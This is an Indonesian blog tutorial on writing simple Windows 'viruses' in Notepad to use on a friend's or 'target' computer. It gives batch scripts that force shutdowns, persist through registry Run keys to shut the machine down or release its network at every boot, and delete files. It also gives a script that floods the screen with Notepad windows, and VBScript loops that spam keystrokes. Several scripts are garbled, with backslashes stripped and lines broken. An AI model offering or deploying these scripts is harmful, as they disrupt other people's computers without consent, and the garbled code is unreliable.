Cara Membuat Virus Dengan Notepad

Cara Membuat Virus Sederhana

Cara Membuat Virus Dengan Notepad-  Sekarang saya mau berbagi sama kalian tentang pembuatan virus menggunakan NOTEPAD.

VIRUS ini lumayan juga kalo dicoba, yah setidaknya bisa mengganti system PC kalian.  Ya udah dari pada kelamaan nyeblak mendingan langsung aja copy paste code2 yang ada di bawah ini ke dalam NOTEPAD.

“Gunakanlah cara membuat virus sederhana dengan notped ini dengan baik-baik dan jangan sampai untuk mengerjai teman kita sendiri ataupun orang lain”

Berikut ini adalah cara  membuat virus sederhana dengan notped adalah sebagai berikut :

  • Membuat Virus Shutdown

Cara kerja virus komputer sederhana ini adalah dengan memaksa komputer teman atau target jadi shutdown. Untuk melakukannya, silakan buka Notepad, dan copy paste kode di bawah. Lalu save file-nya dengan nama ForceShutdown.bat dan type file-nya All file.

  1. @echo off
  2. msg * I don‘t like you
  3. shutdown -c “Error! Komputer kamu terpaksa harus Shutdown!” -s

Untuk mengaktifkan virus ini, kamu harus klik 2 kali pada file-nya. Maka, secara otomatis virus ini akan berjalan.

  • Paksa Shutdown Setiap Kali Dinyalakan

Berbeda dengan virus sebelumnya, virus sederhana yang ini akan memaksa komputer teman kamu untuk Shutdown setiap kali dinyalakan. Eits, jangan asal gunakan virus ini kalo gak siap tanggung akibatnya ya!

  1. echo @echo off>c:windowshartlell.bat
  2. echo break off>>c:windowshartlell.bat
  3. echo shutdown r t 11 f>>c:windowshartlell.bat
  4. echo end>>c:windowshartlell.bat
  5. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
  6. reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
  7. echo You have been HACKED.
  8. PAUSE

Simpan file buatan kamu di atas dengan nama apapun. Jangan lupa gunakan ekstensi .bat ya! Lalu klik untuk mengaktifkannya.

  • Mematikan Internet Secara Permanen

Saat berada di suatu jaringan internet, pasti kesal dong jika ada orang yang malah download? Bikin internet lemot karena bandwith berkurang cepat. Makanya, coba matikan internet teman kamu menggunakan script virus sederhana berikut:

  1. echo @echo off>c:windowswimn32.bat
  2. echo break off>>c:windowswimn32.bat
  3. echo ipconfig/release_all>>c:windowswimn32.bat
  4. echo end>>c:windowswimn32.bat
  5. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
  6. reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
  7. echo You Have Been HACKED!
  8. PAUSE

Seperti biasa, simpan dengan nama apapun dan gunakan ekstensi .bat. Lalu klik untuk mengaktifkannya!

  •  Virus Caps Lock

Siapa yang tidak kesal jika ada orang ngetik isinya huruf besar semua? Orang yang menerima pesan dengan huruf besar semua jelas akan merasa terganggu, atau bahkan marah. Makanya, yuk isengin teman kamu dengan membuat tombol Caps Lock-nya nyala terus menggunakan script virus sederhana berikut:

  1. Set wshShell =wscript.CreateObject(“WScript.Shell”)
  2. do
  3. wscript.sleep 100
  4. wshshell.sendkeys “{CAPSLOCK}”
  5. loop

Copy dan paste kode di atas ke Notepad, lalu simpan dengan nama file ForceCapsLock.vbs dan type file-nya All file. Klik 2 kali untuk mulai mengaktifkan virus komputer sederhana ini.

  • Virus Alay

Siapa bilang cuma anak muda kekinian doang yang bisa alay? Komputer kamu juga bisa alay loh kalo terinspeksi virus keyboard alay. Nah, untuk membuat virus komputer yang akan membuat keyboard jadi alay, kamu bisa gunakan script berikut:

  1. Set wshShell =wscript.CreateObject(“WScript.Shell”)
  2. do
  3. wscript.sleep 100
  4. wshshell.sendkeys “{CAPSLOCK}”
  5. wscript.sleep 100
  6. wshshell.sendkeys “{NUMLOCK}”
  7. wscript.sleep 100
  8. wshshell.sendkeys “{SCROLLLOCK}”
  9. loop

Caranya sama, copy dan paste kode di atas ke Notepad. Lalu save dengan nama ForceAlay.vbsdan type file All file.

  • Virus Orang Jelek

Dikatain jelek itu emang nyebelin. Kalo cuma sekali dua kali sih harusnya masih bisa ditahan, tapi kalo terus-terusan ngatain jelek gimana coba? Nah, dengan kode di bawah ini, kamu bisa membuat sebuah virus komputer sederhana yang akan memaksa komputer target untuk mengeluarkan alert bahwa ‘dia jelek’ tanpa henti.

  1. Set wshShell = wscript.CreateObject(“WScript.Shell”)
  2. do
  3. wscript.sleep 100
  4. wshshell.sendkeys Muka Lu Jelek Kayak Komputer Lu
  5. loop

Copy dan Paste script virus sederhana di atas ke Notepad. Oh iya, kamu bisa ganti bagian warna merah dengan kata-kata sesuai selera, lalu save dengan nama VirusOrangJelek.vbs.

  • Virus Kuis

Semua orang suka kuis apalagi kalo berhadiah. Tapi kamu bakal kesal deh pasti kalo setiap kali mau buka komputer, ternyata yang nongol adalah kuis. Ya kan? Buat kamu yang mau isengin komputer target dengan kuis-kuis menyebalkan. coba kamu gunakan script berikut:

  1. @echo off
  2. title Kuis hari ini!
  3. :menu
  4. cls
  5. echo Jika kamu kena virus apa yang kamu lakukan?
  6. pause
  7. echo pilih yang mana:
  8. echo 1. Matiin komputer
  9. echo 2. Format aja
  10. echo 3. Nangis
  11. echo 4. Beli komputer baru
  12. set input=nothing
  13. set /p input=Choice:
  14. if %input%==1 shutdown s t
  15. 30
  16. if %input%==2 del c:xxx
  17. if %input%==3 @ECHO off
  18. msg * Muka lu jelek
  19. msg * Ngaca dulu gih!
  20. msg * Hayo lu, CPU lu gw acakacak ya
  21. msg * Udah, install ulang aja
  22. msg * Mau kelar kan masalahnya?
  23. @ECHO off
  24. :top
  25. START %SystemRoot%
  26. system32notepad.exe
  27. GOTO top

Copy dan paste deh ke Notepad dengan nama ViruzQuiz.bat. Selesai, tinggal jalankan untuk mengujinya.

Jadi mudah bukan Cara Membuat Virus sederhana dengan Noteped, tapi jangan sekali-kali gunakan virus ini untuk mengerjai orang lain, karena bisa menggangu yang lagi benar-benar ingin belajar.

Selebihnya bisa melihat artikel lainya mengenai Cara Membuat virus sederhana dengan noteped di link berikut ini.

“Terima Kasih dan Semoga Hari Anda Menyenagkan”

 

Leave a Reply

Your email address will not be published. Required fields are marked *